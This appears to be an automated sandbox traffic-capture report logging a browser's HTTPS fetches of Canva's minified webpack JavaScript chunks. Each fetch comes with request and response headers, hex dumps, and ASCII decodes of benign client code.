                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:37 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 11142
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951002b60c411-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49977
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "0a5b04b991fa42e0d9abcef0b0109428"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:23 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:24 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: LLY/BC9ZI8QeTWUmDeHzHAKxyIapYG6hjLCS9mEJg5r+27imiNQJ91DkHPqtCr9PVODFtMc7T/A=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8GFDRVYH4VJCS5
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: JjKEW_4LPG798LLZ0MyECwjiT7NRZ46D
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 64 79 59 69 48 63 49 4c 50 72 56 49 25 32 46 52 78 67 69 38 46 65 44 53 53 69 44 6d 62 74 45 54 44 56 4a 6e 43 64 46 67 6e 52 6f 36 33 70 42 48 34 30 4b 71 7a 67 6e 25 32 42 67 7a 78 6d 44 25 32 42 58 4a 33 25 32 46 74 34 25 32 42 6b 6a 76 43 41 45 25 32 46 69 53 36 79 67 74 46 37 70 57 43 53 42 6d 45 52 67 37 37 37 72 67 6d 56 74 51 59 46 46 56 48 34 64 54 6f 6f 37 6f 5a 58 38 56 36 32 46 4f 35 4a 78 54 45 50 36 55 36 42 4d 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dyYiHcILPrVI%2FRxgi8FeDSSiDmbtETDVJnCdFgnRo63pBH40Kqzgn%2BgzxmD%2BXJ3%2Ft4%2BkjvCAE%2FiS6ygtF7pWCSBmERg777rgmVtQYFFVH4dToo7oZX8V62FO5JxTEP6U6BM%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 32 36 34 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 39 31 36 34 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 34 35 66
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6264],{/***/ 9164:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._45f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 72 72 6f 72 29 7b 76 61 72 20 66 3d 65 2e 63 61 75 73 65 3d 61 2e 74 43 2e 65 72 72 6f 72 3b 66 3d 5b 60 24 7b 66 2e 6e 61 6d 65 7d 60 2c 60 24 7b 66 2e 6d 65 73 73 61 67 65 7d 60 5d 2e 66 69 6c 74 65 72 28 67 3d 3e 21 21 67 29 2e 6a 6f 69 6e 28 22 3a 20 22 29 3b 65 2e 6d 65 73 73 61 67 65 3d 60 24 7b 65 2e 6d 65 73 73 61 67 65 7d 20 28 24 7b 66 7d 29 60 7d 63 28 65 29 7d 29 7d 29 7d 3b 0a 55 41 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 72 51 61 28 62 29 7c 7c 72 51 61 28 61 29 3f 61 3d 6e 65 77 20 71 51 61 28 61 29 3a 28 73 65 6c 66 2e 69 6e 64 65 78 65 64 44 42 3f 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 28 6e 75 6c 6c 21 3d 3d 53 41 26 26 76 6f 69 64 20 30 21 3d 3d 53 41 3f 53
                                                                                                                                                                                                                                                                    Data Ascii: rror){var f=e.cause=a.tC.error;f=[`${f.name}`,`${f.message}`].filter(g=>!!g).join(": ");e.message=`${e.message} (${f})`}c(e)})})};UA=function(a,b){a instanceof Error?rQa(b)||rQa(a)?a=new qQa(a):(self.indexedDB?a instanceof Error?(null!==SA&&void 0!==SA?S
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 61 6c 75 65 3a 61 7d 3a 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 3f 7b 62 79 74 65 73 56 61 6c 75 65 3a 61 7d 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 7b 61 72 72 61 79 56 61 6c 75 65 3a 7b 76 61 6c 75 65 73 3a 61 2e 6d 61 70 28 56 41 29 7d 7d 3a 22 6f 62 6a 65 63 74 22 3d 3d 3d 62 26 26 6e 75 6c 6c 21 3d 61 3f 7b 6b 76 6c 69 73 74 56 61 6c 75 65 3a 7b 76 61 6c 75 65 73 3a 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 61 29 2e 6d 61 70 28 28 5b 63 2c 64 5d 29 3d 3e 28 7b 6b 65 79 3a 63 2c 76 61 6c 75 65 3a 56 41 28 64 29 7d 29 29 7d 7d 3a 7b 7d 7d 3b 42 51 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 6e 65 77 20 4d 61 70 3b 66 6f 72 28 63 6f 6e 73 74 20 63 20 6f 66 20 61 29 61 3d 62 2e 67 65 74
                                                                                                                                                                                                                                                                    Data Ascii: alue:a}:a instanceof Uint8Array?{bytesValue:a}:Array.isArray(a)?{arrayValue:{values:a.map(VA)}}:"object"===b&&null!=a?{kvlistValue:{values:Object.entries(a).map(([c,d])=>({key:c,value:VA(d)}))}}:{}};BQa=function(a){const b=new Map;for(const c of a)a=b.get
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 61 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 73 75 70 65 72 28 22 51 75 6f 74 61 20 65 78 63 65 65 64 65 64 22 29 3b 74 68 69 73 2e 63 61 75 73 65 3d 61 7d 7d 2c 54 41 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 73 75 70 65 72 28 22 49 6e 64 65 78 65 64 20 64 62 20 75 6e 61 76 61 69 6c 61 62 6c 65 22 29 3b 74 68 69 73 2e 63 61 75 73 65 3d 61 7d 7d 2c 53 41 2c 44 51 61 3d 63 6c 61 73 73 20 65 78 74 65 6e 64 73 20 45 72 72 6f 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 73 75 70 65 72 28 22 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 72 6f 77 73 20 65 78 63 65 65 64 65 64 20 66 6f 72 20 70 75 74 20 72 65 71 75 65 73
                                                                                                                                                                                                                                                                    Data Ascii: a=class extends Error{constructor(a){super("Quota exceeded");this.cause=a}},TA=class extends Error{constructor(a){super("Indexed db unavailable");this.cause=a}},SA,DQa=class extends Error{constructor(){super("Maximum number of rows exceeded for put reques
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 28 61 29 7d 61 73 79 6e 63 20 67 65 74 28 61 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 67 65 74 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 78 6e 28 61 29 7d 61 73 79 6e 63 20 64 65 6c 65 74 65 28 61 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 64 65 6c 65 74 65 28 61 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 78 6e 28 61 29 7d 61 73 79 6e 63 20 63 6c 65 61 72 28 29 7b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 63 6c 65 61 72 28 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 78 6e 28 61 29 7d 61 73 79 6e 63 20 67 65 74 41 6c 6c 28 61 2c 62 29 7b 61 3d 74 68 69 73 2e 73 74 6f 72 65 2e 67 65 74 41 6c 6c 28 61 2c 62 29 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 78 6e 28 61 29 7d 61 73 79 6e 63 20 67 65 74 41 6c 6c 4b 65 79 73 28 61 2c 62 29 7b 61
                                                                                                                                                                                                                                                                    Data Ascii: (a)}async get(a){a=this.store.get(a);return this.xn(a)}async delete(a){a=this.store.delete(a);return this.xn(a)}async clear(){const a=this.store.clear();return this.xn(a)}async getAll(a,b){a=this.store.getAll(a,b);return this.xn(a)}async getAllKeys(a,b){a
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 74 65 6e 65 72 28 22 62 6c 6f 63 6b 65 64 22 2c 28 29 3d 3e 7b 6c 3d 21 30 3b 67 28 45 72 72 6f 72 28 22 6f 70 65 72 61 74 69 6f 6e 20 62 6c 6f 63 6b 65 64 20 64 75 65 20 74 6f 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 22 29 29 7d 29 3b 68 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 73 75 63 63 65 73 73 22 2c 28 29 3d 3e 7b 63 6f 6e 73 74 20 6e 3d 0a 68 2e 72 65 73 75 6c 74 3b 6c 3f 6e 2e 63 6c 6f 73 65 28 29 3a 28 6e 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 65 72 73 69 6f 6e 63 68 61 6e 67 65 22 2c 70 3d 3e 7b 28 64 2e 43 62 61 26 26 6e 75 6c 6c 3d 3d 70 2e 6e 65 77 56 65 72 73 69 6f 6e 7c 7c 64 2e 44 62 61 26 26 6e 75 6c 6c 21 3d 70 2e 6e 65 77 56 65 72 73 69 6f 6e 29 26 26 6e 2e 63 6c 6f 73 65 28 29 7d 29 2c 66
                                                                                                                                                                                                                                                                    Data Ascii: tener("blocked",()=>{l=!0;g(Error("operation blocked due to open connections"))});h.addEventListener("success",()=>{const n=h.result;l?n.close():(n.addEventListener("versionchange",p=>{(d.Cba&&null==p.newVersion||d.Dba&&null!=p.newVersion)&&n.close()}),f
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 7b 6e 61 6d 65 3a 61 2c 76 65 72 73 69 6f 6e 3a 31 2c 65 7a 61 3a 64 3d 3e 7b 64 3d 64 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 53 74 6f 72 65 28 61 2c 7b 6b 65 79 50 61 74 68 3a 22 6b 65 79 22 7d 29 3b 69 66 28 62 29 66 6f 72 28 63 6f 6e 73 74 20 7b 6e 61 6d 65 3a 65 2c 6e 64 61 3a 66 2c 2e 2e 2e 67 7d 6f 66 20 62 29 64 2e 63 72 65 61 74 65 49 6e 64 65 78 28 65 2c 60 24 7b 22 72 65 63 6f 72 64 22 7d 2e 24 7b 66 7d 60 2c 67 29 7d 2c 7a 61 61 3a 7b 74 79 70 65 3a 31 2c 43 62 61 3a 21 30 2c 44 62 61 3a 21 30 7d 7d 29 2e 74 68 65 6e 28 64 3d 3e 7b 74 68 69 73 2e 66 79 61 3d 28 29 3d 3e 7b 74 68 69 73 2e 71 6e 61 3d 21 30 3b 74 68 69 73 2e 49 5f 3d 76 6f 69 64 20 30 7d 3b 0a 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 6f 73 65 22 2c 74 68
                                                                                                                                                                                                                                                                    Data Ascii: {name:a,version:1,eza:d=>{d=d.createObjectStore(a,{keyPath:"key"});if(b)for(const {name:e,nda:f,...g}of b)d.createIndex(e,`${"record"}.${f}`,g)},zaa:{type:1,Cba:!0,Dba:!0}}).then(d=>{this.fya=()=>{this.qna=!0;this.I_=void 0};d.addEventListener("close",th
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 65 28 74 68 69 73 2e 79 71 2c 22 72 65 61 64 6f 6e 6c 79 22 2c 61 73 79 6e 63 20 62 3d 3e 28 62 3d 61 77 61 69 74 20 62 2e 67 65 74 28 61 29 29 3f 74 68 69 73 2e 64 65 73 65 72 69 61 6c 69 7a 65 28 62 2e 72 65 63 6f 72 64 29 3a 76 6f 69 64 20 30 29 7d 61 73 79 6e 63 20 64 65 6c 65 74 65 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 7a 47 2e 65 78 65 63 75 74 65 28 74 68 69 73 2e 79 71 2c 22 72 65 61 64 77 72 69 74 65 22 2c 61 73 79 6e 63 20 62 3d 3e 7b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 3f 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 61 2e 6d 61 70 28 63 3d 3e 0a 62 2e 64 65 6c 65 74 65 28 63 29 29 29 3a 61 77 61 69 74 20 62 2e 64 65 6c 65 74 65 28 61 29 7d 29 7d 61 73 79 6e 63 20 63 6f 75 6e 74 28 29 7b 72 65 74 75 72 6e 20 74 68
                                                                                                                                                                                                                                                                    Data Ascii: e(this.yq,"readonly",async b=>(b=await b.get(a))?this.deserialize(b.record):void 0)}async delete(a){return this.zG.execute(this.yq,"readwrite",async b=>{Array.isArray(a)?await Promise.all(a.map(c=>b.delete(c))):await b.delete(a)})}async count(){return th
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC190INData Raw: 3d 61 3b 74 68 69 73 2e 45 57 61 3d 62 3b 74 68 69 73 2e 74 68 72 65 73 68 6f 6c 64 3d 31 45 34 7d 7d 3b 0a 7d 29 2e 63 61 6c 6c 28 73 65 6c 66 2c 20 73 65 6c 66 2e 5f 34 35 66 37 38 35 33 64 63 37 36 36 30 33 37 38 61 30 33 38 39 35 32 62 35 33 63 30 39 35 33 65 29 3b 7d 2c 0a 0a 2f 2a 2a 2a 2f 20 39 37 37 34 35 32 3a 0a 28 5f 2c 20 5f 5f 2c 20 72 29 20 3d 3e 20 72 28 39 31 36 34 29 0a 0a 7d 5d 29 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 66 32 62 39 31 36 61 32 30 35 33 36 36 32 31 65 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                                    Data Ascii: =a;this.EWa=b;this.threshold=1E4}};}).call(self, self._45f7853dc7660378a038952b53c0953e);},/***/ 977452:(_, __, r) => r(9164)}])//# sourceMappingURL=sourcemaps/f2b916a20536621e.js.map


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    42192.168.2.1249764104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:37 UTC787OUTGET /web/3eff736f43ef8805.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:38 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 5961
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951007acc42ef-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49978
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "2011b7a377f83ae563a227efe5de3a62"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:24 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:15 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: PTt8+K2SMiNUyZIRKXnaHhAB+jSKtzeM/sckReM4TO9jcUk+ZlKdX1S8Y+9HlsJVWWy9iC5yxBk=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: HR8HMB21HKVR97W2
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 6qNmtAZjF9YdykPAmLl6MxRj62RVrlOp
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 77 37 50 72 6e 71 68 46 31 35 64 69 78 46 33 52 72 44 63 72 46 48 78 35 44 76 25 32 42 4b 45 72 57 75 79 7a 38 4b 4b 50 61 58 71 63 67 39 57 25 32 46 4e 59 48 56 69 65 46 64 73 38 45 46 31 79 48 43 5a 48 31 4b 4e 76 45 31 51 6b 6c 4d 73 50 49 45 62 33 52 66 57 74 4e 57 4f 6f 49 67 4b 4a 63 49 58 36 77 6d 53 45 70 51 45 46 6c 25 32 46 44 58 61 37 5a 25 32 42 43 39 25 32 42 47 50 25 32 46 45 56 34 6c 31 67 63 73 66 35 47 35 55 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w7PrnqhF15dixF3RrDcrFHx5Dv%2BKErWuyz8KKPaXqcg9W%2FNYHVieFds8EF1yHCZH1KNvE1QklMsPIEb3RfWtNWOoIgKJcIX6wmSEpQEFl%2FDXa7Z%2BC9%2BGP%2FEV4l1gcsf5G5U%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1193INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 38 34 37 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 35 32 33 38 30 38 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6847],{/***/ 523808:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 73 22 29 3b 64 3d 7b 6e 61 6d 65 3a 62 2e 6e 61 6d 65 2c 4e 33 62 3a 60 24 7b 62 2e 64 75 72 61 74 69 6f 6e 7d 6d 73 60 2c 2e 2e 2e 4f 62 6a 65 63 74 2e 66 72 6f 6d 45 6e 74 72 69 65 73 28 62 2e 61 74 74 72 73 2e 65 6e 74 72 69 65 73 28 29 29 7d 3b 65 3d 7b 7d 3b 66 6f 72 28 63 6f 6e 73 74 20 68 20 6f 66 20 4f 62 6a 65 63 74 2e 6b 65 79 73 28 64 29 29 66 3d 64 5b 68 5d 2c 65 5b 68 5d 3d 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 4f 62 6a 65 63 74 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 66 29 3a 66 3b 63 6f 6e 73 6f 6c 65 2e 74 61 62 6c 65 28 65 29 3b 0a 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 45 6e 64 28 29 3b 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 28 29 3b 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 45 6e 64
                                                                                                                                                                                                                                                                    Data Ascii: s");d={name:b.name,N3b:`${b.duration}ms`,...Object.fromEntries(b.attrs.entries())};e={};for(const h of Object.keys(d))f=d[h],e[h]=f instanceof Object?JSON.stringify(f):f;console.table(e);console.groupEnd();null===c||void 0===c?void 0:c();console.groupEnd
                                                                                                                                                                                                                                                                    2024-11-20 15:01:38 UTC1369INData Raw: 6d 69 74 20 52 65 61 63 68 65 64 22 29 29 7d 61 73 79 6e 63 20 66 6c 75 73 68 28 29 7b 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 74 68 69 73 2e 53 62 61 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 2c 62 2c 63 2c 64 29 7b 74 68 69 73 2e 63 6f 6e 66 69 67 3d 61 3b 74 68 69 73 2e 47 3d 62 3b 74 68 69 73 2e 64 39 3d 0a 63 3b 74 68 69 73 2e 73 65 6e 64 3d 64 3b 74 68 69 73 2e 53 62 61 3d 6e 65 77 20 53 65 74 3b 76 61 72 20 65 3b 74 68 69 73 2e 52 70 61 3d 6e 75 6c 6c 21 3d 3d 28 65 3d 61 2e 52 70 61 29 26 26 76 6f 69 64 20 30 21 3d 3d 65 3f 65 3a 49 6e 66 69 6e 69 74 79 7d 7d 3b 76 61 72 20 69 4b 63 3d 28 7b 76 7a 62 3a 61 2c 75 72 6c 3a 62 7d 29 3d 3e 63 3d 3e 7b 63 6f 6e 73 74 20 64 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 63 29 2c 65 3d
                                                                                                                                                                                                                                                                    Data Ascii: mit Reached"))}async flush(){await Promise.all(this.Sba)}constructor(a,b,c,d){this.config=a;this.G=b;this.d9=c;this.send=d;this.Sba=new Set;var e;this.Rpa=null!==(e=a.Rpa)&&void 0!==e?e:Infinity}};var iKc=({vzb:a,url:b})=>c=>{const d=JSON.stringify(c),e=
